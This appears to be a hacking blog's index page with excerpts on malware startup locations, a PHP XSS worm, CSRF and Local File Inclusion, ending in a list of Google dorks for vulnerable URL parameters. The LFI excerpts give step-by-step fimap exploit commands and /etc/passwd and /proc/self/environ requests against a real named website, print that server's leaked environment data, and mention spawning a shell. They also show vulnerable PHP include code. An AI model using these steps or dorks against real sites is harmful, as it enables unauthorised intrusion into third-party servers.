Posts

Places that viruses and trojans hide on start up

Credit - ShaolinTiger - Security Forums

1. START-UP FOLDER. Windows opens every item in the Start Menu's Start Up folder. This folder is prominent in the Programs folder of the Start Menu. Notice that I did not say that Windows "runs" every program that is represented in the Start Up folder. I said it "opens every item." There's an important difference. Programs represented in the Start Up folder will run, of course. But you can have shortcuts in the Start Up folder that represent documents, not programs. For example, if you put a Microsoft Word document in the Start Up folder, Word will run and automatically open that document at bootup; if you put a WAV file there, your audio software will play the music at bootup, and if you put a Web-page Favourites there, Internet Explorer (or your own choice of a browser) will run and open that Web page for you when the computer starts up. (T...

PHP XSS Worm

If you find the formatting of this article to be off, please wget picobsd.amdwebhost.com/~cfc/xss.txt

Before anyone flames me, the code in this article is purposefully flawed. It will not work. A programmer should be able to get it to work in a matter of minutes. I removed some code and modified other stuff so that skiddies don't pick it up. This article is meant for understanding, not as a contribution of code.

A while back, I was poking around a web 2.0 site. I noticed something rather interesting: every single preference for users had its own file. This was probably done because the site, which was AJAX based, modified user information via AJAX, and therefore oftentimes there was only one value being edited at a time. I started poking around these, and I found out early on that all data sanitation was done with JavaScript. I'm assuming this is because the developer was more comfortable with JavaScript, and didn't use PHP for anyt...

Cross-Site Request Forgery (CSRF)

Understanding CSRF

The Express team's csrf and csurf modules frequently have issues popping up concerned about our usage of cryptographic functions. These concerns are unwarranted due to a misunderstanding of how CSRF tokens work. So here's a quick run down! Read this and still have questions? Want to tell us we're wrong? Open an issue!

How does a CSRF attack work?

On their own (phishing site), an attacker could create an AJAX button or form that creates a request against your site:

<form action="https://my.site.com/me/something-destructive" method="POST">
  <button type="submit">Click here for free money!</button>
</form>

This is worse with AJAX as the attacker could use other methods like DELETE as well as read the result. This is particularly important when the user has some sort of session with very personal details on your site. If this is in the context of a techno...

Local File Inclusion Example 3

Step-by-step LFI:

Step 1: The vulnerable link is
    http://www.egenerationglobal.com/index.php?page=offshore_software_development.php

Step 2: Scan it with fimap:
    disktop/fi>fimap.py -u "http://www.egenerationglobal.com/index.php?page=offshore_software_development.php"

Step 3: Exploit with fimap:
    disktop/fi>fimap.py -x "http://www.egenerationglobal.com/index.php?page=offshore_software_development.php"

Step 4: Now it will ask us to choose a domain we wanna exploit; just choose a number.

Step 5: It will ask which of the two available attacks to use, so we need to choose one:
    Spawn Shell ...

Local File Inclusion Example 2

LOCAL FILE INCLUSION:

Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized and allows directory traversal characters to be injected. This tutorial shows you how to get a shell on websites using Local File Inclusion vulnerabilities and injecting malicious code into /proc/self/environ. It is a step-by-step tutorial.

First, let's take a look at PHP code that is vulnerable to LFI:

<?php
// Vulnerable: the user-controlled "page" parameter reaches include() unsanitized
$page = $_GET['page'];
include($page);
?>

Now, this is a piece of code that should NEVER be used, because the $page isn’t sanitized and is passed directly to the webpage, but unfortunately (or not) it is very common to find on the ‘www’.

Step 2: Now we are going to find a Local File Inclusion vulnerable website. So we found our target, let's check it, e.g. www.website.com/view.php?page=contact.php - Now let's replace contact.php...

Local File Inclusion Example 1

Step 1) Find an LFI-vulnerable site
    Example: http://somesite.com/something.php?something=something.something

Step 2) To find out whether the given site is vulnerable to LFI, we insert /etc/passwd and check the site's result
    Example: http://egenerationglobal.com/index.php?page=/etc/passwd
    Now we are sure that this site is vulnerable to LFI (LOCAL FILE INCLUSION)

Step 3) http://egenerationglobal.com/index.php?page=/proc/self/environ

    DOCUMENT_ROOT=/home/egenerat/public_html
    GATEWAY_INTERFACE=CGI/1.1
    HTTP_ACCEPT=text/html,application/xhtmlxml,application/xml; q=0.9,*/*; q=0.8
    HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-;q=0.7,*;q=0.7
    HTTP_ACCEPT_ENCODING=gzip, deflate
    HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5
    HTTP_CONNECTION=keep-alive
    HTTP_HOST=egenerationglobal.com
    HTTP_KEEP_ALIVE=115
    HTTP_USER_AGENT=Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
    PATH=/bin:/usr/bin
    QUERY_STRING=page=/proc/self/environ
    RED...

Google Dorks For Parameters

inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategor...